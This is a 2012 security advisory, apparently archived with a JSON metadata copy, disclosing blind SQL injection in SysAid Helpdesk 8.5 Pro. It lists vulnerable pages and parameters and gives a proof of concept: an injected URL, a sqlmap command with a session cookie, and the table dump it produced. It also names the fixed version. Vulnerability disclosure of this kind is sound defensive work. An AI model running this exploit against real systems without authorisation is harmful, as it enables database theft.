=======
Summary
=======
Name: SysAid Helpdesk Pro - Blind SQL Injection
Release Date: 30 November 2012
Reference: NGS00241
Discoverer: Daniel Compton <daniel.compton@ngssecure.com>
Vendor: SysAid
Vendor Reference:
Systems Affected: SysAid Helpdesk 8.5 Pro
Risk: High
Status: Published
========
TimeLine
========
Discovered: 12 March 2012
Released: 12 March 2012
Approved: 12 March 2012
Reported: 14 March 2012
Fixed: 1 August 2012
Published: 30 November 2012
===========
Description
===========
SysAid Helpdesk V8.5.04 Pro Edition - Blind SQL Injection within the administrator interface. This is a commercial product.
I. VULNERABILITY
-------------------------
SysAid Helpdesk V8.5.04 Pro suffers from Blind SQL injection several pages and parameters. This is exploitable as an authenticated user of the admin interface.
II. BACKGROUND
-------------------------
SyAid is a fully web based helpdesk solution.
http://www.ilient.com/
III. DESCRIPTION
-------------------------
SQL injection has been found and exploited/confirmed within the software as an authenticated user. This is the latest version of SysAid Helpdesk.
=================
Technical Details
=================
IV. PROOF OF CONCEPT
-------------------------
The following URL and parameters have been confirmed to suffer from Blind SQL injection.
/AssetManagementList.jsp (GET Parameter: computerID, group1)
AssetManagementChart.jsp (GET Parameter: group1)
/genericreport (POST Parameter: assetID, customSQL, groupFilter)
CIEdit.jsp (POST Parameter: newClcleared, paelBtnArrayButtons)
/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null'&viewName=Servers%20and%20Network%20devices
python sqlmap.py
--url="http://192.168.1.149:8080/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null&viewName=Servers%20and%20Network%20devices"
--dbms=mysql -p computerID
--cookie="JSESSIONID=1CDC74FF018EE7C2C0CDD3FE54DB79F2" -D ilient --level=5
Database: ilient [10 tables]
+-----------------------+
| account |
| agreement |
| asset2ci |
| asset_catalog |
| asset_catalog_files |
| asset_catalog_history |
| asset_catalog_links |
| asset_data_day_data |
| asset_data_month_data |
| asset_data_week_data |
+-----------------------+
===============
Fix Information
===============
Fixed in version 8.5.08
http://www.sysaid.com/bugs-fixed-8-5.htm#8508
Download Product Patch:
http://cdn3.sysaid.com/SysAidServerPatchFreev8.5.08.exe
NCC Group Research
http://www.nccgroup.com/research
For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>
{"id": "SECURITYVULNS:DOC:28844", "bulletinFamily": "software", "title": "NGS000241 Technical Advisory: SysAid Helpdesk Pro Blind SQL Injection", "description": "\r\n\r\n=======\r\nSummary\r\n=======\r\nName: SysAid Helpdesk Pro - Blind SQL Injection\r\nRelease Date: 30 November 2012\r\nReference: NGS00241\r\nDiscoverer: Daniel Compton <daniel.compton@ngssecure.com>\r\nVendor: SysAid\r\nVendor Reference: \r\nSystems Affected: SysAid Helpdesk 8.5 Pro\r\nRisk: High\r\nStatus: Published\r\n\r\n========\r\nTimeLine\r\n========\r\nDiscovered: 12 March 2012\r\nReleased: 12 March 2012\r\nApproved: 12 March 2012\r\nReported: 14 March 2012\r\nFixed: 1 August 2012\r\nPublished: 30 November 2012\r\n\r\n===========\r\nDescription\r\n===========\r\nSysAid Helpdesk V8.5.04 Pro Edition - Blind SQL Injection within the administrator interface. This is a commercial product.\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\nSysAid Helpdesk V8.5.04 Pro suffers from Blind SQL injection several pages and parameters. This is exploitable as an authenticated user of the admin interface.\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nSyAid is a fully web based helpdesk solution.\r\n\r\nhttp://www.ilient.com/\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nSQL injection has been found and exploited/confirmed within the software as an authenticated user. This is the latest version of SysAid Helpdesk.\r\n\r\n\r\n=================\r\nTechnical Details\r\n=================\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\n\r\nThe following URL and parameters have been confirmed to suffer from Blind SQL injection.\r\n\r\n/AssetManagementList.jsp (GET Parameter: computerID, group1)\r\nAssetManagementChart.jsp (GET Parameter: group1)\r\n/genericreport (POST Parameter: assetID, customSQL, groupFilter)\r\nCIEdit.jsp (POST Parameter: newClcleared, paelBtnArrayButtons)\r\n\r\n/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null'&viewName=Servers%20and%20Network%20devices\r\n\r\npython sqlmap.py\r\n--url="http://192.168.1.149:8080/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null&viewName=Servers%20and%20Network%20devices"\r\n--dbms=mysql -p computerID\r\n--cookie="JSESSIONID=1CDC74FF018EE7C2C0CDD3FE54DB79F2" -D ilient --level=5\r\n\r\n\r\nDatabase: ilient [10 tables] \r\n+-----------------------+ \r\n| account | \r\n| agreement | \r\n| asset2ci | \r\n| asset_catalog | \r\n| asset_catalog_files | \r\n| asset_catalog_history | \r\n| asset_catalog_links | \r\n| asset_data_day_data | \r\n| asset_data_month_data | \r\n| asset_data_week_data |\r\n +-----------------------+\r\n\r\n===============\r\nFix Information\r\n===============\r\nFixed in version 8.5.08\r\n\r\nhttp://www.sysaid.com/bugs-fixed-8-5.htm#8508\r\n\r\nDownload Product Patch:\r\n\r\nhttp://cdn3.sysaid.com/SysAidServerPatchFreev8.5.08.exe\r\n\r\nNCC Group Research\r\nhttp://www.nccgroup.com/research\r\n\r\n\r\nFor more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>\r\nThis email message has been delivered safely and archived online by Mimecast.\r\n</a>\r\n", "published": "2012-12-10T00:00:00", "modified": "2012-12-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28844", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:46", "edition": 1, "viewCount": 56, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12763"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645520394, "score": 1659803227}, "_internal": {"score_hash": "36c8f9db20982f0f87de4dfb87991d4c"}}